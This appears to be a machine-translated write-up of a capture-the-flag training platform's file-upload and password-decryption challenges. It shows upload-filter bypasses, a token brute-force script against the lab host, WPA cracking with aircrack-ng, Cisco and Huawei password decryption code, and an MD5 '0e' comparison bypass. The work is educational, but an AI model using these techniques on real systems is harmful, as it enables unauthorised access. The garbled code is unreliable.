Upload off
[1]
View the source code and find the JS code. The onclick was validated at the time of submission.
Ctrl+shift+i Open the Developer tool and change the Conclick to return True, which can be uploaded
Upload php file and get key
Key is ikhjl9786#$%^&
[2]
View the source code and find the JS file. The discovery is server-side validated.
forge a JPG image to upload, use burp truncation, change the file name to PHP to get the key
Key is 76tyuhjsdvytig#$%^&
[3]
View the source code and find the JS code.
var Filename=document.getelementbyid ("file");
var str=filename.value.split (".");
var ext=str[1];
The discovery just validates the first suffix after the file name, and makes file.jpg.php to bypass
Get key key is 76tyuh12okkytig#$%^&
Decryption off
[1] Log in to the system as an administrator
Direct point reset Password, found to return a blank page. Look at the source code, Discover Tip1, and verify that you're thinking right.
The parameter sukey is found in the URL, with a length of 32 bits, which is MD5 decrypted. Find the following rules
Payload
Import requests
Import Hashlib
Import time
SE = requests.session ()
headers = {' Cookie ': ' Phpsessid=25443616fac3435849c2f3e77b54a4ca '}
While 1:
Sukey = hashlib.new (' MD5 ', str (int (time.time ()))). Hexdigest ()
url = ' http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey= ' + sukey + ' &username =admin '
r = Se.get (URL, headers=headers)
If r.content:
Print R.content
Break
Else
print ' Cracking: ' + sukey
Get the key.
[2] met the sister paper
A package that is opened and found to be encrypted. Need to decrypt.
Follow the prompts to make a dictionary
With open ("Password.txt", "W") as F:
For year in range (1980,2015):
For month in range (1,13):
For day in range (1,32):
F.write ("%d%02d%02d\n"% (year,month,day))
began to crack violently.
[Email protected]:~/desktop# aircrack-ng Wifi-crack.cap
Opening Wifi-crack.cap
Read 17812 packets.
# BSSID ESSID Encryption
1 54:e6:fc:53:e6:d0 hackinglab WPA (1 handshake)
Choosing first network as target.
Opening Wifi-crack.cap
Please specify a dictionary (option-w).
Quitting Aircrack-ng ...
Discover Bssid,essid
[Email protected]:~/desktop# aircrack-ng-e hackinglab-b 54:e6:fc:53:e6:d0-w password.txt wifi-crack.cap
Opening Wifi-crack.cap
Reading packets, please wait ...
Aircrack-ng 1.2 beta3
[00:00:05] 5436 keys tested (954.82 k/s)
KEY found! [19940808]
Master key:92 D0 BF EB E7 B4 D9 E9
B2 1 b E7 A9 B9 C6 5B (FA)
Transient key:58 1D E4 (C4), BA 5A, A7
BA D0 1 A 5C 6E C1 FA A6 1 b A8
8F B4 6D, CD 0B ba ba, A7 6C E1
4D 1 A C1 F1 3D 9A 8C 24 5D 8E 69
EAPOL hmac:02 C8 6C C3 C6 2D DC CA ED 8A 5C 9D CE A6
Get password, MD5 encrypted commit
[3] The evil of Cisco
Install cisco_crack directly to crack
A = "02070d48030f1c294940041801181c0c140d0a0a20253a3b"
Crack=cisco_decrypt. Ciscopassword ()
Crack.decrypt (a)
S = 2
S = 3
S = 4
S = 5
S = 6
S = 7
S = 8
S = 9
S = 10
S = 11
S = 12
S = 13
S = 14
S = 15
S = 16
S = 17
S = 18
S = 19
S = 20
S = 21
S = 22
S = 23
S = 24
' [Email protected] '
[4] The evils of encryption
Prompt Huawei switch, Google search, see an article, unfortunately, Windows can not run this script, put under the Kali, successfully get key.
# Coding=utf-8
From Crypto.cipher import DES
def Decode_char (c):
if c = = ' A ':
r = '? '
Else
R = C
Return Ord (R)-Ord ('! ')
def ascii_to_binary (s):
Assert Len (s) = = 24
out = [0]*18
i = 0
j = 0
For I in range (0, Len (s), 4):
y = Decode_char (s[i + 0])
y = (y << 6) & 0XFFFFFF
K = Decode_char (s[i + 1])
y = (y | k) & 0XFFFFFF
y = (y << 6) & 0XFFFFFF
K = Decode_char (S[i + 2])
y = (y | k) & 0XFFFFFF
y = (y << 6) & 0XFFFFFF
K = Decode_char (S[i + 3])
y = (y | k) & 0XFFFFFF
OUT[J+2] = Chr (Y & 0xff)
OUT[J+1] = Chr ((y>>8) & 0xff)
OUT[J+0] = Chr ((y>>16) & 0xff)
J + = 3
Return "". Join (out)
def decrypt_password (P):
R = Ascii_to_binary (p)
r = r[:16]
D = des.new ("\x01\x02\x03\x04\x05\x06\x07\x08", DES. MODE_ECB)
R = D.decrypt (r)
Return R.rstrip ("\x00")
if __name__ = = ' __main__ ':
Miwen = "ak9q4i" J ' #[q=^q ' maf4<1!! "
Print U ' plaintext ' + decrypt_password (Miwen)
[5] Xiao Ming, who likes to brew Internet cafes
No
[6] Exception data
There is a =, obvious base64 encryption behind the encrypted data. But it's all capitalized, and it's probably all capitalized.
Payload
From Base64 Import *
Import re
def DFS (res, arr, POS):
Res.append (". Join (arr)")
i = pos
For I in range (I, Len (arr)):
If arr[i] <= ' Z ' and arr[i] >= ' A ':
Arr[i] = Arr[i].lower ()
DFS (res, arr, i + 1)
Arr[i] = Arr[i].upper ()
arr = list (' agv5iulsb3zlvse= ')
res = []
DFS (res, arr, 0)
Res_decode = Map (B64decode, RES)
For I in Res_decode:
If Re.findall (R ' \\x ', repr (i)):
Continue
Else
Print I
hey! irovku!
hey! iroveu!
[7]md5 really can collide?
<?php
$flag =flag;
if (isset ($_post["password")) {
$password =$_post[' password '];
$rootadmin = "!1793422703!";
if ($password = = $rootadmin) {die ("attack admin account!");}
if (MD5 ($password) ==MD5 ($rootadmin)) {
Echo $flag;
}else{
Die ("Password error!");
}
}
?>
>>> hashlib.md5 ("!1793422703!"). Hexdigest ()
' 0e332932043729729062996282883873 '
The beginning of the 0e final value is displayed as 0.
Direct Baidu "MD5,0E" Post submitted password=s214587387a get flag
[8] Xiao Ming fell in love with a hardware of the sister-in-heart cool
Change to TXT file. Found
Serialization::archive Saleaeasyncserialanalyzer 0 20 13973230967232177885 1 1 9600 8 1 0 1 0 0
Async Serial Analyzer Baidu Search for a file name.
View other writeup, to download the software, open to get flag
[9]
No train of thought, add later
Network Information Security Defense learning Platform upload, decryption customs clearance writeup